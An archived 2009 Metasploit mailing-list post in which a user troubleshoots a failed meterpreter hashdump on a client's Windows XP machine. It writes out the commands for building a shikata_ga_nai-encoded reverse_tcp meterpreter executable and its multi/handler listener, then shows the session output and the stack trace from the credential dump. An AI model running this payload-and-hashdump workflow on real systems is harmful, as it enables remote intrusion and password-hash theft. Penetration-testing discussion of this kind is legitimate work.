Metasploit mailing list archives
Problem with meterpreter, priv, hashdump, etc.
From: wfdawson at bellsouth.net (wfdawson at bellsouth.net)
Date: Sat, 18 Apr 2009 19:24:45 +0000
Hi all, I have used msfpayload to create a .exe to connect back to me successfully in the past, and find it to be a great tool. However, today I seem to be hitting the wall when I try to get a hashdump out of the remote system. Here's the scenario: I should add, this is all done with a fresh local copy from the subversion trunk, revision 6490, and with ~/.msf3 removed entirely and refreshed by a new call to msfconsole before starting. I created an executable with the following command: ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe I started msfconsole (as root) with an rc file: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x set LPORT 443 exploit My session started just fine: resource> use exploit/multi/handler resource> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource> set LHOST x.x.x.x LHOST => x.x.x.x resource> set LPORT 443 LPORT => 443 resource> exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... On the remote system, I started the rv_443.exe and saw the connection back to my msfconsole session: [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:1210) And, I was able to get info back from the remote system, as expected. meterpreter > sysinfo Computer: sanitized for the clients protection! OS : Windows XP (Build 2600, Service Pack 3). meterpreter > ls Listing: C:\DOKUME~1\someuser\LOKALE~1\Temp\FFC0EAB.tmp ===================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 . 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 .. etc. etc. etc. However, when I tried to use priv and then execute hashdump, or any other command thereafter, I got errors. I got no errors with 'ls' just after 'use priv', but I did get errors with 'ls' after 'hashdump'. meterpreter > hashdump [-] Error running command hashdump: wrong number of arguments (0 for 1) /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `initialize'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `exception'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `raise'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `send_request'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/extensions/priv/priv.rb:44:in `sam_hashes'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:39:in `cmd_hashdump'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `call'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `run'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'/home/wdawson/Software/metasploit/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/interactive.rb:48:in `interact'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/core.rb:997:in `cmd_sessions'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:190:in `load_resource'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `each_line'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `load_resource'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:103:in `initialize'./msfconsole:82:in `new'./msfconsole:82 Would this be at all due to the fact that the remote system is (seemingly) using a German locale, or is it due to some other factor? Thanks in advance for any suggestions or insight. -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090418/69fee30b/attachment.htm>
Current thread:
- problem Payload options (php/reverse_php) robert (Apr 18)
- problem Payload options (php/reverse_php) Enrico (Apr 18)
- Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
- Problem with meterpreter, priv, hashdump, etc. rogue (Apr 18)
- Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
- Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
- problem Payload options (php/reverse_php) Enrico (Apr 18)
- problem Payload options (php/reverse_php) Edward Bjarte Fjellskål (Apr 18)